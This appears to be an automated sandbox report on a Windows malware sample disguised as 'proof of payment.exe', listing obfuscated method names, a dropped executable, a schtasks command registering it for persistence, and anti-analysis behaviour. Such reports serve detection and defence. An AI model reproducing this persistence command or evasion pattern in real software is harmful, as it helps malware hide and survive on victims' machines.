                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, ijAOQ7mRGBRMsxXAQS.csHigh entropy of concatenated method names: 'id80MrVhlr', 'fsw0VIEihp', 'qC50HAu48f', 'SbtHFc2cwO', 'TSoHzCf1XE', 'cjl08o6SaB', 'UMb07Xp8jK', 'B3K0raOfa1', 'UVw0T6ZRnD', 'o6D0jMNDxJ'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, m27lXb6r4MZHCO3jU8.csHigh entropy of concatenated method names: 'Sih2OOCtM', 'n52BO9bSD', 'b8RvG7YEC', 'JXZ30KgVr', 'rssU2I0M5', 'rWO4W2Hc1', 'zDuv7tNsEPTgry2KMo', 'C5w0yhE86TSUGIafMT', 'UZGX8cNuO', 'g2XhkjOhy'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, NmD84IhXqX5T6TEkV6.csHigh entropy of concatenated method names: 'wCHpJPJyR0', 'sxRpFvTw8H', 'eJMX8bKCu2', 'fUQX79yjrG', 'VZUpQaEvUO', 'x3opPsGdNj', 'xy0pALit6q', 'WV5pRXljyr', 'OxCpZLEIc9', 'cOPpnkgyns'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, F2PTqtdykfFUcIb56j.csHigh entropy of concatenated method names: 'AYgX9KKbxn', 'IqJXtfDiRt', 'UREXcWxQJf', 'VvfXqHxDDH', 'EYjXREkAOI', 'IjNXmuPgeM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, lCRMA5DlhXbJjo7mgP.csHigh entropy of concatenated method names: 'XOUK7fOCGk', 'eBtKTbHBlE', 'GNrKjjqQYp', 'mniKMCNMTC', 'HkgKaTcPaL', 's5bKSBPZ9g', 'G7kKHQUQjE', 't64XE23Zn0', 'mkBXJjYgka', 'DVXXeBXhbW'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csHigh entropy of concatenated method names: 'eWBTLXt3er', 'iOtTMlUF5l', 'OQ4TaT1ZsC', 'VibTVbpR7H', 'ADVTS4dCv0', 'KadTHMkTAy', 'vNhT0qwQbT', 'VZtTD7HKkP', 'dxpTIOGC08', 'qQHTu998oi'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, rhi5WUbqRqYWJ4I5aL.csHigh entropy of concatenated method names: 'gXhpu9v1k5', 'OIqpkIdKxY', 'ToString', 'De3pMtqr5e', 'eIlpa4KGgS', 'jRTpVokqo0', 'LYEpSmeS0j', 'ALqpH6LbN9', 'vosp0ysL2B', 'wmRpDn8t0K'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, CmapgpqkNF7N5qJ90ud.csHigh entropy of concatenated method names: 'alqKOrJ0pj', 'og8KWuXd29', 'iIAK2rCVFe', 'GWTKBUdRp1', 'UwMKx4rRBo', 'RDHKvT0qhU', 'fjHK3v12CM', 'cmdKgBShHa', 'YhIKUBFLmT', 'JmNK404BNS'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, HZasU9nsywqiKFgaDv.csHigh entropy of concatenated method names: 'onQaRYYxBE', 'IM2aZtghIN', 'RpFanjrrNu', 'sIka6VaZwU', 'BavayUICgv', 'PdAaCMI85I', 'KmEaES8IZt', 'nKraJ28955', 'opkaew46xI', 'K1xaFe1Yc2'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, t3dR5NEyPQ0BnbAjPf.csHigh entropy of concatenated method names: 'KNHXMolEP8', 'MFVXaqPpuS', 'APNXVJBc3n', 'bE9XSoGTZE', 'uoYXHO6fxn', 'AYZX0iFBhY', 'OGvXD9JRVh', 'dHcXIGfsdW', 'TIpXufgcOF', 'wufXkDqp0f'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, zUd261zcGb9YwcjLSm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UUtKfeexau', 'QuMKsB0qwN', 'vbwKGbQ8Rm', 'GC9KpQCDUY', 'qhYKX3mUHu', 't4TKKjEyun', 'v3iKhbT2Un'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, ir4OiiaLqZUjSaiS1D.csHigh entropy of concatenated method names: 'BPZ70EqBf8', 'Iso7D7DIGj', 'mON7u8pSmB', 'otW7kHJ1EU', 'Nph7snNx7b', 'N7o7Gd9CgL', 'YWb0Zj1DxBQUSZDFr5', 'd0DGejsIX4gCSvvaDM', 'gTr77yfym1', 'fiq7TWyUCH'
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00406EB0 ShellExecuteW,URLDownloadToFileW,12_2_00406EB0
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Roaming\NvbYSEq.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040F7A7 Sleep,ExitProcess,12_2_0040F7A7
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: D10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 2660000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 4660000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 7550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 6C30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 8550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: 9550000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: C20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 25A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 45A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 6F00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 7F00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 80A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory allocated: 90A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A748
                    Source: C:\Users\user\Desktop\proof of payment.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7158
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2275
                    Source: C:\Users\user\Desktop\proof of payment.exe | Window / User API: threadDelayed 6725
                    Source: C:\Users\user\Desktop\proof of payment.exe | Window / User API: threadDelayed 2964
                    Source: C:\Users\user\Desktop\proof of payment.exe | Window / User API: foregroundWindowGot 1771
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | API coverage: 6.1 %
                    Source: C:\Users\user\Desktop\proof of payment.exe | API coverage: 9.7 %
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 2280 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1132 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 3152 | Thread sleep count: 108 > 30
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 3152 | Thread sleep time: -54000s >= -30000s
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944 | Thread sleep count: 6725 > 30
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944 | Thread sleep time: -20175000s >= -30000s
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944 | Thread sleep count: 2964 > 30
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944 | Thread sleep time: -8892000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe TID: 1708 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10006580 FindFirstFileExA,7_2_10006580
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\proof of payment.exe | API call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
